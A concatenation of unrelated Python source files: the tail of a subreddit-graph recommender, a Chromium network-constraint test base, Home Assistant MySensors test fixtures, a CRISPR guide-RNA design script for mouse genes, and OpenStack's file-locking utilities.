sub = self.query_db(sub_name)
else:
sub = self.col.find_one({'name': sub_name})
self.local_dict[sub_name] = sub
return sub
def generate_graph(self, seed, render):
""" Create graph by connecting adjacent nodes """
self.sensored_cnt = 0
# Ensure the generated file indicates nsfw or not
filename = seed + '_d' + str(self.depth)
filename = os.path.join(self.output_path, filename)
if self.nsfw:
filename += '_nsfw'
g = Digraph('G', format='png', filename=filename + '.gv')
sub = self.query_db(seed)
if not sub:
return ('Failure', 'Subreddit not in database, please try another subreddit')
seed_cnt = sub['subscribers']
if sub['up_links'] != []:
g = self.add_edges(g, seed, self.depth, up=True, reverse=False)
self.msg("Traversing up, then down")
up_links = sub['up_links']
for item in up_links:
# Ignore if a referrer does not have 20% subscribers
# Prevent very small subs from clustering about a huge one
# subreddit = self.query_db(item)
# if subreddit['subscribers'] < (seed_cnt * 0.2):
# continue
g = self.add_edges(g, item, self.depth - 1, up=True, reverse=True)
self.msg("Travsering straight down")
if sub['down_links'] != []:
g = self.add_edges(g, seed, self.depth)
if not len(self.edges):
return ('Failure', 'Graph is empty, please try another subreddit')
if self.censored_cnt >= 1:
self.msg('# of NSFW nodes removed: ' + str(self.censored_cnt))
# Draw graphviz graph
if render:
# Save graphviz file
g.save()
g.render(view=True)
# Save json for D3
filename = filename + '.json'
with open(filename, "wt") as d3:
print('{"nodes":[', end="", file=d3)
print(', '.join(self.d3_node_list), end="", file=d3)
print('], "links":[', end="", file=d3)
print(', '.join(self.d3_edges), end="", file=d3)
print(']}', end="", file=d3)
self.cleanup()
return ('Success', filename)
def add_edges(self, graph, seed, depth, up=False, reverse=False):
""" Add subreddits to graph as parent->child nodes through recusive lookup """
subreddit = self.query_db(seed)
if (depth == 0) or (not subreddit):
return graph
# Apply censor before wasting time
if subreddit['nsfw'] and not self.nsfw:
self.censored_cnt += 1
return graph
# Get current number of subscribers
seed_cnt = subreddit['subscribers']
# This is used once to get the sibling referers
# Rather than go straight up or down, go up one level and recurse down
if reverse:
up = not up
if up:
if seed in self.up_visited:
return graph
else:
self.up_visited[seed] = True
links = subreddit['up_links']
else:
if seed in self.down_visited:
return graph
else:
self.down_visited[seed] = True
links = subreddit['down_links']
self.msg('depth: ' + str(depth))
self.msg(seed)
self.msg(links)
# As we get further from the seed we need to be more careful
# about adding child nodes
distance = self.depth / depth
subs = links
for sub in subs:
# Error in database, ignoring now
if (sub == ':**') or (not sub):
continue
# If a child has less than 20% of the parent's subscribers filter it out
# This is to prevent too much clustering
new_link = self.query_db(sub)
if new_link:
new_cnt = new_link['subscribers']
if (new_cnt < (seed_cnt * 0.2 * distance)) and (self.depth - depth > 0):
continue
else:
continue
# If traversing up, change direction of nodes
if up:
a_node, b_node = sub, seed
a_cnt, b_cnt = new_cnt, seed_cnt
else:
a_node, b_node = seed, sub
a_cnt, b_cnt = seed_cnt, new_cnt
# Add an index for each node:
# d3 connects edges as idxA->idxB
# so we need to store their names and numbers (indices)
self.update_nodes(a_node, a_cnt)
self.update_nodes(b_node, b_cnt)
# Keep graph simple by only adding unqiue edges
cur_edge = a_node + " -> " + b_node
self.msg(cur_edge)
if not cur_edge in self.edges:
# Add edge for graphviz
graph.edge(a_node, b_node)
# Add edge for d3.js
self.d3_edges.append('{"source":' + str(self.node_idx_map[a_node]) +
',"target":' + str(self.node_idx_map[b_node]) +
',"value":' + str(depth) + '}')
# Save edge to ensure it can only be added once
self.edges[cur_edge] = True
# Recurse related subs until depth is exhausted
graph = self.add_edges(graph, sub, depth - 1, up)
# Save cache to disk
pickle.dump(self.local_dict, open("local_dict.pickle", "wb"))
return graph
def update_nodes(self, node, cnt):
if not node in self.node_idx_map:
self.node_idx_map[node] = len(self.node_idx_map)
try:
# Scale subscriber counts to emphasis order of magnitude difference
# without letting large subs dominate the graph
scale = math.ceil(math.log(cnt, 10))
size = str(scale * scale)
except:
size = '10'
self.d3_node_list.append(
'{"name":"' + node + '", "subs":"' + size + '"}')
def cleanup(self):
self.edges = {}
self.censored_cnt = 0
def usage(parser):
""" Let the user know the expected runtime args """
if len(sys.argv) == 1:
parser.print_help()
sys.exit()
def main():
""" Parse cli args and kick off graph generation """
parser = argparse.ArgumentParser()
parser.add_argument('-d', '--depth', type=int, default=2,
help='Tree traversal depth')
parser.add_argument('-r', '--render', action='store_true', default=False,
help='Render graph')
parser.add_argument('-n', '--nsfw', action='store_true', default=False,
help='Allow over 18 subreddits as nodes')
parser.add_argument('-s', '--subreddit', required=True,
help='Root subreddit')
parser.add_argument('-v', '--verbose', action='store_true', default=False,
help='Show debugging')
usage(parser)
args = parser.parse_args()
recommender = Recommender(args.depth, args.nsfw, args.verbose)
recommender.load_dataset()
recommender.generate_graph(args.subreddit, args.render)
if __name__ == '__main__':
main()
|
|
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Constrained network server (CNS) test base."""
import logging
import os
import Queue
import subprocess
import sys
import threading
import urllib2
import pyauto
import pyauto_paths
# List of commonly used network constraints settings.
# Each setting is a tuppe of the form:
# ('TEST_NAME', [BANDWIDTH_Kbps, LATENCY_ms, PACKET_LOSS_%])
#
# Note: The test name should satisfy the regex [\w\.-]+ (check
# tools/perf_expectations/tests/perf_expectations_unittest.py for details). It
# is used to name the result graphs on the dashboards.
#
# The WiFi, DSL, and Cable settings were taken from webpagetest.org as
# approximations of their respective real world networks. The settings were
# based on 2011 FCC Broadband Data report (http://www.fcc.gov/document/
# measuring-broadband-america-report-consumer-broadband-performance-us).
DialUp = ('DialUp', [56, 120, 5])
Slow = ('Slow', [256, 105, 1])
Wifi = ('Wifi', [1024, 60, 0])
DSL = ('DSL', [1541, 50, 0])
Cable = ('Cable', [5120, 28, 0])
NoConstraints = ('NoConstraints', [0, 0, 0])
# Path to CNS executable relative to source root.
_CNS_PATH = os.path.join(
'media', 'tools', 'constrained_network_server', 'cns.py')
# Port to start the CNS on.
_CNS_PORT = 9000
# A flag to determine whether to launch a local CNS instance or to connect
# to the external CNS server. Default to False since all current bots use an
# external instance.
# If not on Windows, set USE_LOCAL_CNS=1 env variable to switch the flag.
USE_LOCAL_CNS = ('win' not in sys.platform and 'USE_LOCAL_CNS' in os.environ and
os.environ['USE_LOCAL_CNS'] == '1')
# Base CNS URL, only requires & separated parameter names appended.
if USE_LOCAL_CNS:
CNS_BASE_URL = 'http://127.0.0.1:%d/ServeConstrained?' % _CNS_PORT
else:
CNS_BASE_URL = 'http://chromeperf34:%d/ServeConstrained?' % _CNS_PORT
CNS_CLEANUP_URL = 'http://chromeperf34:%d/Cleanup' % _CNS_PORT
# Used for server sanity check.
_TEST_VIDEO = 'roller.webm'
# Directory root to serve files from.
_ROOT_PATH = os.path.join(pyauto.PyUITest.DataDir(), 'pyauto_private', 'media')
class CNSTestBase(pyauto.PyUITest):
"""CNS test base hadles startup and teardown of CNS server."""
def __init__(self, *args, **kwargs):
"""Initialize CNSTestBase by setting the arguments for CNS server.
Args:
Check cns.py command line argument list for details.
"""
self._port = kwargs.get('port', _CNS_PORT)
self._interface = kwargs.get('interface', 'lo')
self._www_root = kwargs.get('www_root', _ROOT_PATH)
self._verbose = kwargs.get('verbose', True)
self._expiry_time = kwargs.get('expiry_time', 0)
self._socket_timeout = kwargs.get('socket_timeout')
pyauto.PyUITest.__init__(self, *args, **kwargs)
def setUp(self):
"""Ensures the Constrained Network Server (CNS) server is up and running."""
if USE_LOCAL_CNS:
self._SetUpLocal()
else:
self._SetUpExternal()
def _SetUpExternal(self):
"""Ensures the test can connect to the external CNS server."""
if self.WaitUntil(self._CanAccessServer, retry_sleep=3, timeout=30,
debug=False):
pyauto.PyUITest.setUp(self)
else:
self.fail('Failed to connect to CNS.')
def _SetUpLocal(self):
"""Starts the CNS server locally."""
cmd = [sys.executable, os.path.join(pyauto_paths.GetSourceDir(), _CNS_PATH),
'--port', str(self._port),
'--interface', self._interface,
'--www-root', self._www_root,
'--expiry-time', str(self._expiry_time)]
if self._socket_timeout:
cmd.extend(['--socket-timeout', str(self._socket_timeout)])
if self._verbose:
cmd.append('-v')
logging.debug('Starting CNS server: %s ', ' '.join(cmd))
self._cns_process = subprocess.Popen(cmd, stderr=subprocess.PIPE)
ProcessLogger(self._cns_process)
if self.WaitUntil(self._CanAccessServer, retry_sleep=3, timeout=30,
debug=False):
pyauto.PyUITest.setUp(self)
else:
self.tearDown()
self.fail('Failed to start CNS.')
def _CanAccessServer(self):
"""Checks if the CNS server can serve a file with no network constraints."""
test_url = ''.join([CNS_BASE_URL, 'f=', _TEST_VIDEO])
try:
return urllib2.urlopen(test_url) is not None
except Exception:
return False
def tearDown(self):
"""Stops the Constrained Network Server (CNS)."""
if USE_LOCAL_CNS:
logging.debug('Stopping CNS server.')
# Do not use process.kill(), it will not clean up cns.
self.Kill(self._cns_process.pid)
# Need to wait since the process logger has a lock on the process stderr.
self._cns_process.wait()
self.assertFalse(self._cns_process.returncode is None)
logging.debug('CNS server stopped.')
else:
# Call CNS Cleanup to remove all ports created by this client.
self.NavigateToURL(CNS_CLEANUP_URL)
pyauto.PyUITest.tearDown(self)
class ProcessLogger(threading.Thread):
"""A thread to log a process's stderr output."""
def __init__(self, process):
"""Starts the process logger thread.
Args:
process: The process to log.
"""
threading.Thread.__init__(self)
self._process = process
self.start()
def run(self):
"""Adds debug statements for the process's stderr output."""
line = True
while line:
line = self._process.stderr.readline()
logging.debug(line.strip())
def GetFileURL(file_name, bandwidth=0, latency=0, loss=0, new_port=False):
"""Returns CNS URL for the file with specified constraints.
Args:
Check cns.ServeConstrained() args for more details.
"""
video_url = [CNS_BASE_URL, 'f=' + file_name]
if bandwidth > 0:
video_url.append('bandwidth=%d' % bandwidth)
if latency > 0:
video_url.append('latency=%d' % latency)
if loss > 0:
video_url.append('loss=%d' % loss)
if new_port:
video_url.append('new_port=%s' % new_port)
return '&'.join(video_url)
def CreateCNSPerfTasks(network_constraints_settings, test_media_files):
"""Returns a queue of tasks combinining network constrains with media files.
Args:
network_constraints_settings: List of (setting_name, setting_values)
tupples.
test_media_files: List of media files to run the tests on.
"""
# Convert relative test path into an absolute path.
tasks = Queue.Queue()
for file_name in test_media_files:
for series_name, settings in network_constraints_settings:
logging.debug('Add test: %s\tSettings: %s\tMedia: %s', series_name,
settings, file_name)
tasks.put((series_name, settings, file_name))
return tasks
|
|
"""Provide common mysensors fixtures."""
from __future__ import annotations
from collections.abc import AsyncGenerator, Generator
import json
from typing import Any, Callable
from unittest.mock import MagicMock, patch
from mysensors.persistence import MySensorsJSONDecoder
from mysensors.sensor import Sensor
import pytest
from homeassistant.components.device_tracker.legacy import Device
from homeassistant.components.mqtt import DOMAIN as MQTT_DOMAIN
from homeassistant.components.mysensors import CONF_VERSION, DEFAULT_BAUD_RATE
from homeassistant.components.mysensors.const import (
CONF_BAUD_RATE,
CONF_DEVICE,
CONF_GATEWAY_TYPE,
CONF_GATEWAY_TYPE_SERIAL,
CONF_GATEWAYS,
DOMAIN,
)
from homeassistant.core import HomeAssistant
from homeassistant.setup import async_setup_component
from tests.common import MockConfigEntry, load_fixture
@pytest.fixture(autouse=True)
def device_tracker_storage(mock_device_tracker_conf: list[Device]) -> list[Device]:
"""Mock out device tracker known devices storage."""
devices = mock_device_tracker_conf
return devices
@pytest.fixture(name="mqtt")
def mock_mqtt_fixture(hass: HomeAssistant) -> None:
"""Mock the MQTT integration."""
hass.config.components.add(MQTT_DOMAIN)
@pytest.fixture(name="is_serial_port")
def is_serial_port_fixture() -> Generator[MagicMock, None, None]:
"""Patch the serial port check."""
with patch("homeassistant.components.mysensors.gateway.cv.isdevice") as is_device:
is_device.side_effect = lambda device: device
yield is_device
@pytest.fixture(name="gateway_nodes")
def gateway_nodes_fixture() -> dict[int, Sensor]:
"""Return the gateway nodes dict."""
return {}
@pytest.fixture(name="serial_transport")
async def serial_transport_fixture(
gateway_nodes: dict[int, Sensor],
is_serial_port: MagicMock,
) -> AsyncGenerator[dict[int, Sensor], None]:
"""Mock a serial transport."""
with patch(
"mysensors.gateway_serial.AsyncTransport", autospec=True
) as transport_class, patch("mysensors.AsyncTasks", autospec=True) as tasks_class:
tasks = tasks_class.return_value
tasks.persistence = MagicMock
mock_gateway_features(tasks, transport_class, gateway_nodes)
yield transport_class
def mock_gateway_features(
tasks: MagicMock, transport_class: MagicMock, nodes: dict[int, Sensor]
) -> None:
"""Mock the gateway features."""
async def mock_start_persistence() -> None:
"""Load nodes from via persistence."""
gateway = transport_class.call_args[0][0]
gateway.sensors.update(nodes)
tasks.start_persistence.side_effect = mock_start_persistence
async def mock_start() -> None:
"""Mock the start method."""
gateway = transport_class.call_args[0][0]
gateway.on_conn_made(gateway)
tasks.start.side_effect = mock_start
@pytest.fixture(name="transport")
def transport_fixture(serial_transport: MagicMock) -> MagicMock:
"""Return the default mocked transport."""
return serial_transport
@pytest.fixture(name="serial_entry")
async def serial_entry_fixture(hass: HomeAssistant) -> MockConfigEntry:
"""Create a config entry for a serial gateway."""
entry = MockConfigEntry(
domain=DOMAIN,
data={
CONF_GATEWAY_TYPE: CONF_GATEWAY_TYPE_SERIAL,
CONF_VERSION: "2.3",
CONF_DEVICE: "/test/device",
CONF_BAUD_RATE: DEFAULT_BAUD_RATE,
},
)
return entry
@pytest.fixture(name="config_entry")
def config_entry_fixture(serial_entry: MockConfigEntry) -> MockConfigEntry:
"""Provide the config entry used for integration set up."""
return serial_entry
@pytest.fixture
async def integration(
hass: HomeAssistant, transport: MagicMock, config_entry: MockConfigEntry
) -> AsyncGenerator[tuple[MockConfigEntry, Callable[[str], None]], None]:
"""Set up the mysensors integration with a config entry."""
device = config_entry.data[CONF_DEVICE]
config: dict[str, Any] = {DOMAIN: {CONF_GATEWAYS: [{CONF_DEVICE: device}]}}
config_entry.add_to_hass(hass)
def receive_message(message_string: str) -> None:
"""Receive a message with the transport.
The message_string parameter is a string in the MySensors message format.
"""
gateway = transport.call_args[0][0]
# node_id;child_id;command;ack;type;payload\n
gateway.logic(message_string)
with patch("homeassistant.components.mysensors.device.UPDATE_DELAY", new=0):
await async_setup_component(hass, DOMAIN, config)
await hass.async_block_till_done()
yield config_entry, receive_message
def load_nodes_state(fixture_path: str) -> dict:
"""Load mysensors nodes fixture."""
return json.loads(load_fixture(fixture_path), cls=MySensorsJSONDecoder)
def update_gateway_nodes(
gateway_nodes: dict[int, Sensor], nodes: dict[int, Sensor]
) -> dict:
"""Update the gateway nodes."""
gateway_nodes.update(nodes)
return nodes
@pytest.fixture(name="gps_sensor_state", scope="session")
def gps_sensor_state_fixture() -> dict:
"""Load the gps sensor state."""
return load_nodes_state("mysensors/gps_sensor_state.json")
@pytest.fixture
def gps_sensor(gateway_nodes: dict[int, Sensor], gps_sensor_state: dict) -> Sensor:
"""Load the gps sensor."""
nodes = update_gateway_nodes(gateway_nodes, gps_sensor_state)
node = nodes[1]
return node
@pytest.fixture(name="power_sensor_state", scope="session")
def power_sensor_state_fixture() -> dict:
"""Load the power sensor state."""
return load_nodes_state("mysensors/power_sensor_state.json")
@pytest.fixture
def power_sensor(gateway_nodes: dict[int, Sensor], power_sensor_state: dict) -> Sensor:
"""Load the power sensor."""
nodes = update_gateway_nodes(gateway_nodes, power_sensor_state)
node = nodes[1]
return node
@pytest.fixture(name="energy_sensor_state", scope="session")
def energy_sensor_state_fixture() -> dict:
"""Load the energy sensor state."""
return load_nodes_state("mysensors/energy_sensor_state.json")
@pytest.fixture
def energy_sensor(
gateway_nodes: dict[int, Sensor], energy_sensor_state: dict
) -> Sensor:
"""Load the energy sensor."""
nodes = update_gateway_nodes(gateway_nodes, energy_sensor_state)
node = nodes[1]
return node
@pytest.fixture(name="sound_sensor_state", scope="session")
def sound_sensor_state_fixture() -> dict:
"""Load the sound sensor state."""
return load_nodes_state("mysensors/sound_sensor_state.json")
@pytest.fixture
def sound_sensor(gateway_nodes: dict[int, Sensor], sound_sensor_state: dict) -> Sensor:
"""Load the sound sensor."""
nodes = update_gateway_nodes(gateway_nodes, sound_sensor_state)
node = nodes[1]
return node
@pytest.fixture(name="distance_sensor_state", scope="session")
def distance_sensor_state_fixture() -> dict:
"""Load the distance sensor state."""
return load_nodes_state("mysensors/distance_sensor_state.json")
@pytest.fixture
def distance_sensor(
gateway_nodes: dict[int, Sensor], distance_sensor_state: dict
) -> Sensor:
"""Load the distance sensor."""
nodes = update_gateway_nodes(gateway_nodes, distance_sensor_state)
node = nodes[1]
return node
@pytest.fixture(name="temperature_sensor_state", scope="session")
def temperature_sensor_state_fixture() -> dict:
"""Load the temperature sensor state."""
return load_nodes_state("mysensors/temperature_sensor_state.json")
@pytest.fixture
def temperature_sensor(
gateway_nodes: dict[int, Sensor], temperature_sensor_state: dict
) -> Sensor:
"""Load the temperature sensor."""
nodes = update_gateway_nodes(gateway_nodes, temperature_sensor_state)
node = nodes[1]
return node
|
|
import msgpack
import json
import pickle
import os.path
from Queue import PriorityQueue
import re
import doench_score
import azimuth.model_comparison
import numpy as np
import pandas as pd
import csv
from intervaltree import IntervalTree
class GuideRNA():
"""Holder of gRNA information"""
def __init__(self, selected, start, seq, PAM, score, exon_ranking, ensembl_gene, gene_name, functional_domain=None):
self.start = start
self.seq = seq
self.PAM = PAM
self.score = score
self.exon_ranking = exon_ranking
self.ensembl_gene = ensembl_gene
self.gene_name = gene_name
self.selected = selected
self.functional_domain = functional_domain
def serialize_for_display(self):
"""Serialize for the way we are returning json"""
serialization = {
"score": self.score,
"start": self.start,
"seq": self.seq,
"PAM": self.PAM,
"selected": self.selected,
}
if self.functional_domain != None:
serialization["functional_domain"] = self.functional_domain
return serialization
def __cmp__(self, other):
return cmp(self.score, other.score)
params = {
"PAM": "NGG",
"protospacer_len": 20,
"prime5": True,
"scoring": "Azimuth",
"quantity": 100,
"functional_domains": True
}
# azimuth mdoel
azimuth_saved_model_dir = os.path.join(os.path.dirname(azimuth.__file__), 'saved_models')
model_name = 'V3_model_full.pickle'
azimuth_model_file = os.path.join(azimuth_saved_model_dir, model_name)
with open(azimuth_model_file, 'rb') as f:
azimuth_model = pickle.load(f)
# Create interval tree for functional domains
print "constructing interval tuples"
interval_tuples_dict = {}
ucsc_pfam_f = '../functional_domains/ucsc_pfam_GRCm38.txt'
with open(ucsc_pfam_f, 'r') as pfam_csv:
csvreader = csv.reader(pfam_csv, delimiter='\t')
next(csvreader) # skip header
for row in csvreader:
chrom = row[1]
start = row[2]
end = row[3]
name = row[4]
if chrom not in interval_tuples_dict:
interval_tuples_dict[chrom] = []
new_tuple = (int(start), int(end), name)
interval_tuples_dict[chrom].append(new_tuple)
print "constructing interval trees"
interval_trees_dict = {}
for k, v in interval_tuples_dict.iteritems():
interval_trees_dict[k] = IntervalTree.from_tuples(v)
modPAM = params["PAM"]
modPAM = modPAM.replace('N', '[ATCG]')
params["modPAM"] = modPAM
params["PAM_len"] = len(params["PAM"])
revcompl = lambda x: ''.join([{'A':'T','C':'G','G':'C','T':'A','N':'N'}[B] for B in x][::-1])
print "constructing refGene"
refGeneFilename = '../gtex/gtex_mouse/refGene_mouse.txt'
refGene = pd.read_csv(refGeneFilename, sep="\t")
refGene.columns=['','name','chrom','strand','txStart','txEnd','cdsStart','cdsEnd','exonCount','exonStarts','exonEnds','id','name2','cdsStartStat','cdsEndStat','exonFrames']
refGene["exonStarts"] = refGene.apply(lambda x: x['exonStarts'].split(',')[:-1], axis=1)
refGene["exonEnds"] = refGene.apply(lambda x: x['exonEnds'].split(',')[:-1], axis=1)
refGene["exonFrames"] = refGene.apply(lambda x: x['exonFrames'].split(',')[:-1], axis=1)
def gene_exon_coords(gene_name, exon):
try:
location = refGene.loc[refGene['name2'] == gene_name]
start = list(location['exonStarts'])[-1][exon]
end = list(location['exonEnds'])[-1][exon]
chrom = list(location['chrom'])[-1]
return {
'start': int(start),
'end': int(end),
'chrom': str(chrom)
}
except IndexError:
return None
def gene_exon_file(gene, exon):
filename = gene + "_" + str(exon)
seq_path = os.path.join('../GRCm38_exons/', filename)
if os.path.isfile(seq_path):
with open(seq_path) as infile:
return infile.read().upper()
else:
return None
with open('genes_list_GRCm38.txt') as genes_list_file:
genes_list = genes_list_file.read().split('\n')
# gene format: {"ensembl_id": "ENSG00000261122.2", "name": "5S_rRNA", "description": ""}
for gene_name in genes_list:
exon = 0
seq = gene_exon_file(gene_name, exon)
coords = gene_exon_coords(gene_name, exon)
while seq and coords:
# Check if we haven't done this in a preivous run of the program
outfile_name = gene_name + "_" + str(exon) + ".p"
folder = '../GRCm38_guides_msgpack_' + params["scoring"] + '/'
if params['functional_domains']:
folder = '../GRCm38_guides_msgpack_' + params['scoring'] + '_domains/'
output_path = os.path.join(folder, outfile_name)
if os.path.isfile(output_path):
# prepare next exon
exon += 1
seq = gene_exon_file(gene_name, exon)
coords = gene_exon_coords(gene_name, exon)
continue
q = PriorityQueue()
domain_q = PriorityQueue()
def process_guide(m, selected, max_queue_size, seq, domain):
if 'N' in seq:
return
PAM_start = m.start()
score = 0
if params["scoring"] == "Doench":
# Doench score requires the 4 before and 6 after 20-mer (gives 30-mer)
mer30 = seq[PAM_start-params["protospacer_len"]-4:PAM_start+params["PAM_len"]+3]
if len(mer30) == 30:
score = doench_score.calc_score(mer30)
elif params["scoring"] == "Azimuth":
# Azimuth requires the 4 before and 6 after 20-mer (gives 30-mer)
mer30 = seq[PAM_start-params["protospacer_len"]-4:PAM_start+params["PAM_len"]+3]
if len(mer30) == 30:
score = azimuth.model_comparison.predict(np.array([mer30]), aa_cut=None, percent_peptide=None, model=azimuth_model, model_file=azimuth_model_file)[0]
protospacer = ""
PAM = ""
if params["prime5"]:
protospacer = seq[PAM_start-params["protospacer_len"]:PAM_start]
PAM = seq[PAM_start:PAM_start+params["PAM_len"]]
else:
protospacer = seq[PAM_start+params["PAM_len"]:PAM_start+params["PAM_len"]+params["protospacer_len"]]
PAM = seq[PAM_start:PAM_start+params["PAM_len"]]
potential_gRNA = GuideRNA(selected, PAM_start-params["protospacer_len"], protospacer, PAM, score, exon, gene_name, gene_name, domain)
if domain:
domain_q.put(potential_gRNA)
# If there's enough room, add it, no question.
elif q.qsize() < max_queue_size:
q.put(potential_gRNA)
# Otherwise, take higher score
else:
lowest_gRNA = q.get()
if potential_gRNA.score > lowest_gRNA.score:
q.put(potential_gRNA)
else:
q.put(lowest_gRNA)
for m in re.finditer(params["modPAM"], seq):
if params["prime5"] and (m.start() < params["protospacer_len"] or m.start() + params["PAM_len"] > len(seq)):
continue
elif not params["prime5"] and (m.start() + params["PAM_len"] + params["protospacer_len"] > len(seq)):
continue
# Functional domains currently only supported for Cas9.
# This needs to be modified for other genome editing proteins.
domain = None
if params["PAM"] == "NGG" and params["functional_domains"]: # spCas9
cut_site = coords['start'] + m.start() - 3
chrom = coords['chrom']
if chrom in interval_trees_dict:
domain_matches = list(interval_trees_dict[chrom][cut_site])
if len(domain_matches) > 0:
domain = domain_matches[0].data
process_guide(m, True, params["quantity"], seq, domain)
seq_rc = revcompl(seq)
for m in re.finditer(params["modPAM"], seq_rc):
if params["prime5"] and (m.start() < params["protospacer_len"] or m.start() + params["PAM_len"] > len(seq)):
continue
elif not params["prime5"] and (m.start() + params["PAM_len"] + params["protospacer_len"] > len(seq)):
continue
# Functional domains currently only supported for Cas9.
# This needs to be modified for other genome editing proteins.
domain = None
if params["PAM"] == "NGG" and params["functional_domains"]: #spCas9
cut_site = coords['end'] - m.start() + 3
chrom = coords['chrom']
if chrom in interval_trees_dict:
domain_matches = list(interval_trees_dict[chrom][cut_site])
if len(domain_matches) > 0:
domain = domain_matches[0].data
process_guide(m, True, params["quantity"], seq_rc, domain)
# Pop gRNAs into our 'permanent' storage
count = 0
gRNAs = []
while not q.empty() and count < params["quantity"]:
gRNA = q.get()
gRNAs.append(gRNA.serialize_for_display())
count = count + 1
while not domain_q.empty() and count < params["quantity"]:
gRNA = domain_q.get()
gRNAs.append(gRNA.serialize_for_display())
count = count + 1
domain_count = count
outfile_name = gene_name + "_" + str(exon) + ".p"
if domain_count > 0:
print "for {0} we had {1} domain and {2} ordinary guides.".format(outfile_name, domain_count, count - domain_count)
folder = '../GRCm38_guides_msgpack_' + params['scoring'] + '/'
if params['functional_domains']:
folder = '../GRCm38_guides_msgpack_' + params['scoring'] + '_domains/'
output_path = os.path.join(folder, outfile_name)
with open(output_path, 'w') as outfile:
# Reverse gRNAs list.
# Want highest on-target first.
msgpack.dump(gRNAs[::-1], outfile)
# prepare next exon
exon += 1
seq = gene_exon_file(gene_name, exon)
coords = gene_exon_coords(gene_name, exon)
|
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import contextlib
import errno
import functools
import os
import shutil
import subprocess
import sys
import tempfile
import threading
import time
import weakref
from oslo.config import cfg
from nailgun.openstack.common import fileutils
from nailgun.openstack.common.gettextutils import _ # noqa
from nailgun.openstack.common import local
from nailgun.openstack.common import log as logging
LOG = logging.getLogger(__name__)
util_opts = [
cfg.BoolOpt('disable_process_locking', default=False,
help='Whether to disable inter-process locks'),
cfg.StrOpt('lock_path',
default=os.environ.get("NAILGUN_LOCK_PATH"),
help=('Directory to use for lock files.'))
]
CONF = cfg.CONF
CONF.register_opts(util_opts)
def set_defaults(lock_path):
cfg.set_defaults(util_opts, lock_path=lock_path)
class _InterProcessLock(object):
"""Lock implementation which allows multiple locks, working around
issues like bugs.debian.org/cgi-bin/bugreport.cgi?bug=632857 and does
not require any cleanup. Since the lock is always held on a file
descriptor rather than outside of the process, the lock gets dropped
automatically if the process crashes, even if __exit__ is not executed.
There are no guarantees regarding usage by multiple green threads in a
single process here. This lock works only between processes. Exclusive
access between local threads should be achieved using the semaphores
in the @synchronized decorator.
Note these locks are released when the descriptor is closed, so it's not
safe to close the file descriptor while another green thread holds the
lock. Just opening and closing the lock file can break synchronisation,
so lock files must be accessed only using this abstraction.
"""
def __init__(self, name):
self.lockfile = None
self.fname = name
def __enter__(self):
self.lockfile = open(self.fname, 'w')
while True:
try:
# Using non-blocking locks since green threads are not
# patched to deal with blocking locking calls.
# Also upon reading the MSDN docs for locking(), it seems
# to have a laughable 10 attempts "blocking" mechanism.
self.trylock()
return self
except IOError as e:
if e.errno in (errno.EACCES, errno.EAGAIN):
# external locks synchronise things like iptables
# updates - give it some time to prevent busy spinning
time.sleep(0.01)
else:
raise
def __exit__(self, exc_type, exc_val, exc_tb):
try:
self.unlock()
self.lockfile.close()
except IOError:
LOG.exception(_("Could not release the acquired lock `%s`"),
self.fname)
def trylock(self):
raise NotImplementedError()
def unlock(self):
raise NotImplementedError()
class _WindowsLock(_InterProcessLock):
def trylock(self):
msvcrt.locking(self.lockfile.fileno(), msvcrt.LK_NBLCK, 1)
def unlock(self):
msvcrt.locking(self.lockfile.fileno(), msvcrt.LK_UNLCK, 1)
class _PosixLock(_InterProcessLock):
def trylock(self):
fcntl.lockf(self.lockfile, fcntl.LOCK_EX | fcntl.LOCK_NB)
def unlock(self):
fcntl.lockf(self.lockfile, fcntl.LOCK_UN)
if os.name == 'nt':
import msvcrt
InterProcessLock = _WindowsLock
else:
import fcntl
InterProcessLock = _PosixLock
_semaphores = weakref.WeakValueDictionary()
_semaphores_lock = threading.Lock()
@contextlib.contextmanager
def lock(name, lock_file_prefix=None, external=False, lock_path=None):
"""Context based lock
This function yields a `threading.Semaphore` instance (if we don't use
eventlet.monkey_patch(), else `semaphore.Semaphore`) unless external is
True, in which case, it'll yield an InterProcessLock instance.
:param lock_file_prefix: The lock_file_prefix argument is used to provide
lock files on disk with a meaningful prefix.
:param external: The external keyword argument denotes whether this lock
should work across multiple processes. This means that if two different
workers both run a a method decorated with @synchronized('mylock',
external=True), only one of them will execute at a time.
:param lock_path: The lock_path keyword argument is used to specify a
special location for external lock files to live. If nothing is set, then
CONF.lock_path is used as a default.
"""
with _semaphores_lock:
try:
sem = _semaphores[name]
except KeyError:
sem = threading.Semaphore()
_semaphores[name] = sem
with sem:
LOG.debug(_('Got semaphore "%(lock)s"'), {'lock': name})
# NOTE(mikal): I know this looks odd
if not hasattr(local.strong_store, 'locks_held'):
local.strong_store.locks_held = []
local.strong_store.locks_held.append(name)
try:
if external and not CONF.disable_process_locking:
LOG.debug(_('Attempting to grab file lock "%(lock)s"'),
{'lock': name})
# We need a copy of lock_path because it is non-local
local_lock_path = lock_path or CONF.lock_path
if not local_lock_path:
raise cfg.RequiredOptError('lock_path')
if not os.path.exists(local_lock_path):
fileutils.ensure_tree(local_lock_path)
LOG.info(_('Created lock path: %s'), local_lock_path)
def add_prefix(name, prefix):
if not prefix:
return name
sep = '' if prefix.endswith('-') else '-'
return '%s%s%s' % (prefix, sep, name)
# NOTE(mikal): the lock name cannot contain directory
# separators
lock_file_name = add_prefix(name.replace(os.sep, '_'),
lock_file_prefix)
lock_file_path = os.path.join(local_lock_path, lock_file_name)
try:
lock = InterProcessLock(lock_file_path)
with lock as lock:
LOG.debug(_('Got file lock "%(lock)s" at %(path)s'),
{'lock': name, 'path': lock_file_path})
yield lock
finally:
LOG.debug(_('Released file lock "%(lock)s" at %(path)s'),
{'lock': name, 'path': lock_file_path})
else:
yield sem
finally:
local.strong_store.locks_held.remove(name)
def synchronized(name, lock_file_prefix=None, external=False, lock_path=None):
"""Synchronization decorator.
Decorating a method like so::
@synchronized('mylock')
def foo(self, *args):
...
